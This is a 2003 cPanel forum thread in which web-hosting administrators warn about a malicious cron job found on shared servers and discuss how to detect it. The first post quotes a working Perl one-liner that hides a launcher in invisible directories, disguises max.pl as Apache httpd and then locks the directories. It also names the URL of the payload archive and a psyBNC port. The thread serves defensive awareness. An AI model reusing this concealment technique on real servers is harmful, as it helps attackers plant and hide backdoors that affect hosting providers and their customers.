The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

If you allow cronjobs

Discussion in 'General Discussion' started by dgbaker, May 17, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    If you allow users to setup cronjobs watch for the following.

    perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)


    In most cases this user is an innocent victim and it is actually another user doing the real damage.

    The script that is being installed is this one.

    http://ibitzica.com/m.tgz

    Look for this in home directories or search for the CRONEXE it is one of the variables that is setup in the php install file.

    If you are seeing abnormal apache failures, extreme bandwidth usage, or suspect any backdoors or such check for this. It will be trying to setup PSYBNC.SYSTEM.PORT1=1124

    So make sure your firewalls are blocking this port.
     
  2. FWC

    FWC Well-Known Member

    Joined:
    May 13, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ontario, Canada
    Thanks for the tip, David. Something else to keep an eye on. :rolleyes:
     
  3. jackal

    jackal Well-Known Member
    PartnerNOC

    Joined:
    Feb 23, 2002
    Messages:
    708
    Likes Received:
    0
    Trophy Points:
    16
    Hey David, we had a signup the other day for a yearly package that had this installed we found it within 30 minutes. We sent him around 5 emails no reponse then we suspended the account. That made him come out from hiding. We actually talked with him on ICQ after we found it. But this was a strange guy with strange responses. We finally just deleted his account.
     
  4. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Good find!

    Our biggest thing with this was it was able to install in two other peoples home directories.

    Make sure to do good thorough search for hidden directories like .x and search for the max.pl script as well.
     
    #4 dgbaker, May 17, 2003
    Last edited: May 17, 2003
  5. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    That's not good :(

    How did they manage to do that? And how to prevent this?
     
  6. jackal

    jackal Well-Known Member
    PartnerNOC

    Joined:
    Feb 23, 2002
    Messages:
    708
    Likes Received:
    0
    Trophy Points:
    16
    No max.pl found David. Sent you a pm David
     
  7. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    That's the lovely thing with that script, it allows that to happen.
     
  8. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    Im sorry but if you have a decent firewall that only opens what you need why would we be careful with port 1124? I dont know about you but i dont open usused ports. :rolleyes:
     
  9. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    FYI max.pl is part of a the webmin suit that we use on our server. A check resulted in the following;

    root@srv05 [/var/log]# locate max.pl
    /usr/local/src/webmin-1.060/useradmin/help/max.pl.html
     
  10. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Re: Re: If you allow cronjobs

    Umm, neither do we, but is informing others bad thing now? Also if your using software firewalls on your server they can be taken down. Any exploit that gets through apache and can gain root can change that port. Checking your ports regularily is called being diligent with your server security.

    Just because a firewall blocks it I am still not going to allow users to even try using this stuff. For us and the other clients I deal with, there is a zero tolerance for any cr@p.

    If you're not checking for these types of things, firewall or not it is no wonder you seem to have an abundant more problems then most of us have encountered.
     
    #10 dgbaker, May 18, 2003
    Last edited: May 18, 2003
  11. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    So, does that mean if I name a file something that belongs to another program I can run it freely on your system no matter what the code it? Cool, can I have an account with you?

    Also that is not max.pl but is max.pl.html see the difference?

    html versus perl = two different languages
     
Loading...

Share This Page